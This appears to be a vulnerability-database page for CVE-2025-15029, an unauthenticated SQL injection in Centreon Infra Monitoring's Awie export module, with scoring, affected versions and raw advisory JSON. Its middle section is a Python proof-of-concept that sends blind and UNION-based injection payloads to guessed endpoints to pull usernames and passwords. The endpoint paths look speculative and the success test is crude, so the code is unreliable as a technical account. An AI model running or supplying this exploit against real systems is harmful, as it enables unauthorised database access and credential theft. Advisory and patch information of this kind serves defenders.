Security Vulnerability Report
中文
CVE-2025-15029 CVSS 9.8 CRITICAL

CVE-2025-15029

Published: 2026-01-05 15:15:44
Last Modified: 2026-01-26 15:30:14
Source: bd4443e6-1eef-43f3-9886-25fc9ceeaae7

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows SQL Injection to unauthenticated user. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE
Centreon Infra Monitoring 25.10.0 < 25.10.2
Centreon Infra Monitoring 24.10.0 < 24.10.3
Centreon Infra Monitoring 24.04.0 < 24.04.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15029 Centreon SQL Injection PoC # Target: Centreon Infra Monitoring (Awie export modules) # Vulnerability: SQL Injection in unauthenticated access def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-15029 This exploits the SQL injection in Centreon Awie export module """ # SQL Injection payload - extracts database version # Using time-based blind SQL injection technique payload = "' OR (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) -- " # Target endpoint - Awie export functionality # Adjust path based on Centreon installation endpoints = [ "/centreon/api/index.php?action=awieExport", "/api/index.php?action=awieExport", "/centreon/main.php?p=60401&o=awie_export" ] headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; Centreon Scanner)" } data = { "export_format": "sql", "host_id": payload, "service_id": "1" } print(f"[*] Targeting: {target_url}") print(f"[*] Payload: {payload}") for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint try: print(f"[*] Testing endpoint: {endpoint}") response = requests.post( full_url, data=data, headers=headers, timeout=10, verify=False ) if response.status_code == 200: print(f"[!] Potential vulnerability at {endpoint}") print(f"[*] Response length: {len(response.text)}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") return False def extract_data(target_url): """ Extract sensitive data using UNION-based SQL injection """ # UNION injection payload to extract users table union_payload = "' UNION SELECT 1,2,username,password,5,6,7,8,9 FROM users -- " data = { "export_format": "sql", "host_id": union_payload, "service_id": "1" } try: response = requests.post( target_url + "/centreon/api/index.php?action=awieExport", data=data, timeout=30 ) if "admin" in response.text.lower() or "password" in response.text.lower(): print("[!] Successfully extracted sensitive data") print(response.text[:500]) except Exception as e: print(f"[-] Data extraction failed: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-15029.py <target_url>") print("Example: python cve-2025-15029.py http://vulnerable-centreon-server") sys.exit(1) target = sys.argv[1] exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15029", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2026-01-05T15:15:44.330", "lastModified": "2026-01-26T15:30:13.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows SQL Injection to unauthenticated user.\n\nThis issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.3", "matchCriteriaId": "6C79E858-3E29-4916-9516-E1B7E3EF62B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.3", "matchCriteriaId": "9F2DA74C-7DB5-47F3-A8E8-7F55E4C73B7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.10.0", "versionEndExcluding": "25.10.2", "matchCriteriaId": "79268CBB-6F6E-45DF-89AA-0D47A201D600"}]}]}], "references": [{"url": "https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.